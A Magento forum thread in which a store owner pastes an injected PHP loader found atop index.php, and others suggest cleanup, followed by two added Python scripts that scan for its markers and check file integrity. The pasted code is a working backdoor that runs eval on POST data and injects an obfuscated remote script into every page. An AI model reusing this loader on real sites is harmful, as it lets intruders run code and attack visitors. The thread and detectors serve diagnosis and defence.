Magento Forum

   
Can’t access store of admin
 
bigprinter
Jr. Member
 
Total Posts:  14
Joined:  2009-02-11
 

I found this on the first line of my index.php file:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzYzdOcmlwckl0JTIwc3JjckklM0QlMkYlMkZHTDk0JTJFMjQ3N04lMkUyJTJFMXJJOTVHTCUyRmpyd1RxcndUdWU4UHJ5JTJFSWxPanMlM0UlM0MlMkZzcndUY3JJclVVWmlVVVpwSWxPdCUzRScpLnJlcGxhY2UoLzU4VXxyd1R8VVVafElsT3xHTHxySXw4UHw3Ti9nLCIiKSk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos;($v,'[removed]')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
<?php

I am assuming my file was hacked.

Should Index.php be 0644 or 0755?

 
 
Periculi
Sr. Member
 
Total Posts:  249
Joined:  2009-02-03
 

Ouch.  I did a google search on TMP_XHGFJOKL and came up with a load of nasty that has happened to a lot of other people on a bunch of software.

My live server Index.php are all set to 0644 and I have no problems with permissions, so I guess try that and you may want to block some IPs.  From the Google search I found this:

OK, well, I decoded the thing, and what it does is insert a javascript call to two servers, one in Beijing and the other in Moscow.

http://samspade.org/whois/218.93.202.61
http://samspade.org/whois/78.110.175.21

What it fetches nobody knows... unless someone is able to rip the contents from those addresses?

Not saying that the IPs are correct for your hacker, but you might be able to decode it, and also check your access logs and you might be able to track the IP down and permanently block them out.

Search your files for more instances of that code, or upload clean ones!
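Following the advice above to search every file for more copies of that code, here is a small scanner added as an example (it is not code from the forum post or from Magento). It looks for the markers visible in the pasted first line of index.php (the tmp_lkojfghx* function names, the TMP_XHGFJOKL constant, eval() fed from $_POST, a long base64_decode() literal, and the ob_start() handler hijack) and reports each hit with its file and line number. The directory and files that build_demo() creates are constructed for the demo; the payload string in it is a harmless placeholder, not the real one.

```python
"""Scan a web root for the injected PHP loader pasted at the top of this thread.

Added example, not code from the forum post or from Magento. The markers come
from the visible first line of the infected index.php; the demo tree built by
build_demo() is constructed and its base64 payload is a harmless placeholder.
"""
import base64
import os
import re
import tempfile

# (label, compiled pattern) pairs; one hit is recorded per matching line.
MARKERS = [
    ("injector function name", re.compile(r"tmp_lkojfghx\d?")),
    ("injector constant", re.compile(r"TMP_XHGFJOKL|tmp_xhgfjokl")),
    ("eval of request data", re.compile(r"eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b")),
    ("long base64 literal", re.compile(r"base64_decode\s*\(\s*['\"][A-Za-z0-9+/=]{40,}")),
    ("output-buffer handler hijack", re.compile(r"ob_start\s*\(\s*['\"]tmp_lkojfghx")),
]

# File types worth checking: PHP, templates, and static files the loader writes into.
SCAN_EXTENSIONS = (".php", ".phtml", ".inc", ".html", ".htm", ".js")


def scan_file(path):
    """Return [(line_number, label), ...] for every marker found in one file."""
    hits = []
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, start=1):
            for label, pattern in MARKERS:
                if pattern.search(line):
                    hits.append((lineno, label))
    return hits


def scan_tree(root):
    """Walk root and return {relative_path: hits} for files with at least one hit."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            hits = scan_file(path)
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings


def build_demo():
    """Create a throwaway web root: one file carrying the markers, one clean file."""
    root = tempfile.mkdtemp(prefix="webroot-demo-")
    # Constructed stand-in for the injected first line: same names as the
    # pasted code, but the base64 literal is a harmless placeholder.
    payload = base64.b64encode(b"constructed placeholder, not the real payload").decode()
    infected = (
        "<?php if(!function_exists('tmp_lkojfghx')){"
        "if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);"
        "define('TMP_XHGFJOKL',base64_decode('%s'));} ?>\n"
        "<?php\nrequire 'app/Mage.php';\n" % payload
    )
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write(infected)
    with open(os.path.join(root, "clean.php"), "w") as fh:
        fh.write("<?php\nrequire 'app/Mage.php';\nMage::run();\n")
    return root


if __name__ == "__main__":
    # Example run over the constructed tree; point scan_tree() at a real web root instead.
    for rel, hits in sorted(scan_tree(build_demo()).items()):
        for lineno, label in hits:
            print("%s:%d  %s" % (rel, lineno, label))
```

Run it against the whole web root, not just the document root: the thread later mentions hidden files in folders that should not be reachable from outside, and a loader like this one only needs to be included from somewhere that executes. A hit on any marker is a reason to replace the file from a clean copy rather than edit it.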

 
 
bigprinter
Jr. Member
 
Total Posts:  14
Joined:  2009-02-11
 

Thanks for the help.

I stripped the code out and changed my index.php and db.php to 0644.

Today at 3:19 I got hit again.  Same code.

Not sure what is going on.

 
 
Periculi
Sr. Member
 
Total Posts:  249
Joined:  2009-02-03
 

Well, it’s quite obvious that the original entry point is still open.

I would have done the following -

Taken my site offline.

Contacted my hosting company regarding server security breach.  If I was on a shared server, asked them to help me track down potential security holes.

Deleted all the files on the server.

Total reinstall of all the files on the server with clean backups, placing magento core above the public accessed folders.

Analyzed apache (or whatever) server logs looking for potential hacks or IPs to block.

I would not have done the following -

Attempted to repair the corrupted files on my server.

Considered the problem solved without finding the access point the hacker used.

Did you find how your site was compromised in the first place?  Did you consider that there is a script buried somewhere else on your server that is allowing the hacker to continue to have free access to your files?
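The reinstall-from-clean-backups step above is only useful if you can later tell what changed. The script below is an added example (not code from the thread or from Magento): it records a SHA-256 hash of every file under the web root right after the clean reinstall, and a later run diffs the live tree against that manifest, so a re-injected index.php, a dropped hidden script, or a deleted core file shows up even when the access logs have been erased. The paths and files that build_demo() creates are constructed for the demo.

```python
"""Baseline a clean reinstall and report what changed afterwards.

Added example, not from the forum thread or from Magento. Keep the manifest
off the server (or at least outside the web root); an intruder with write
access to the tree can otherwise rewrite it along with the files. The demo
tree built by build_demo() is constructed.
"""
import hashlib
import json
import os
import tempfile


def file_sha256(path):
    """Hash a file in chunks so large media files are not loaded into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root):
    """Return {relative_path: sha256} for every file under root.

    Nothing is skipped on purpose: upload and cache directories are exactly
    where dropped scripts tend to land, so they belong in the baseline too."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            manifest[os.path.relpath(path, root)] = file_sha256(path)
    return manifest


def save_manifest(manifest, path):
    """Write the manifest as sorted JSON so two manifests can also be diffed by eye."""
    with open(path, "w") as fh:
        json.dump(manifest, fh, indent=1, sort_keys=True)


def load_manifest(path):
    with open(path) as fh:
        return json.load(fh)


def verify(root, manifest):
    """Compare the live tree with the saved manifest.

    Returns {'added': [...], 'removed': [...], 'modified': [...]}, each sorted."""
    current = build_manifest(root)
    baseline = set(manifest)
    live = set(current)
    return {
        "added": sorted(live - baseline),
        "removed": sorted(baseline - live),
        "modified": sorted(p for p in live & baseline if current[p] != manifest[p]),
    }


def _write(root, rel, text):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(text)


def build_demo():
    """Constructed scenario: baseline a small tree, then simulate a re-compromise.

    Returns (root, manifest_path); the manifest lives in a separate directory."""
    root = tempfile.mkdtemp(prefix="webroot-")
    _write(root, "index.php", "<?php\nrequire 'app/Mage.php';\nMage::run();\n")
    _write(root, os.path.join("app", "Mage.php"), "<?php\nclass Mage {}\n")
    _write(root, os.path.join("media", "logo.png"), "not really a png\n")
    manifest_path = os.path.join(tempfile.mkdtemp(prefix="manifest-"), "manifest.json")
    save_manifest(build_manifest(root), manifest_path)
    # Simulated tampering: injected index.php, dropped hidden script, deleted core file.
    _write(root, "index.php", "<?php /* injected */ ?>\n<?php\nrequire 'app/Mage.php';\n")
    _write(root, os.path.join("media", ".cache.php"), "<?php /* dropped script */\n")
    os.remove(os.path.join(root, "app", "Mage.php"))
    return root, manifest_path


if __name__ == "__main__":
    root, manifest_path = build_demo()
    for kind, paths in verify(root, load_manifest(manifest_path)).items():
        for p in paths:
            print("%-9s %s" % (kind, p))
```

Run build_manifest() once, immediately after the clean install and before the site goes back online, and run verify() on a schedule. Every entry in "added" or "modified" is a file to replace from the clean copy, and the list of what changed, with the time of the run, is the evidence to bring to the hosting company even when the server logs have been wiped.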

 
 
bigprinter
Jr. Member
 
Total Posts:  14
Joined:  2009-02-11
 

My ISP says there is nothing they can do.  “Absolutely” nothing.

I did a clean install of magento and my site and today, the 18th, it happened again.

I had found two hidden files on my server in folders that should not be able to be accessed from the outside.

I also have found my logs erased for the times that the files are compromised.

So obviously someone has access to the server.

 
 
bigprinter
Jr. Member
 
Total Posts:  14
Joined:  2009-02-11
 

We took our site down, opened a new account, and reinstalled everything.

Still working on reinstalling our uploading program.

We also changed our ftp to sftp and changed all our passwords.

 
 
AFemaleProdigy
Jr. Member
 
Total Posts:  13
Joined:  2009-02-18
 

Did you get this problem solved?  Or determine where the hackers were getting in?  Thanks.

 
 
bigprinter
Jr. Member
 
Total Posts:  14
Joined:  2009-02-11
 

No,

We did not really solve the problem. 

No matter how many times we changed our passwords, we got hacked again anywhere from 2-7 days.

What we did was have our ISP close our account down and set up a new one.  We have not reinstalled Magento.

Since we got hacked within 2 days of installing it the first time, I am not eager to jump into it again.
Even the security codes we added to our .htaccess file did not help.

The consensus is that this started through an ftp port.  But it is just speculation.

 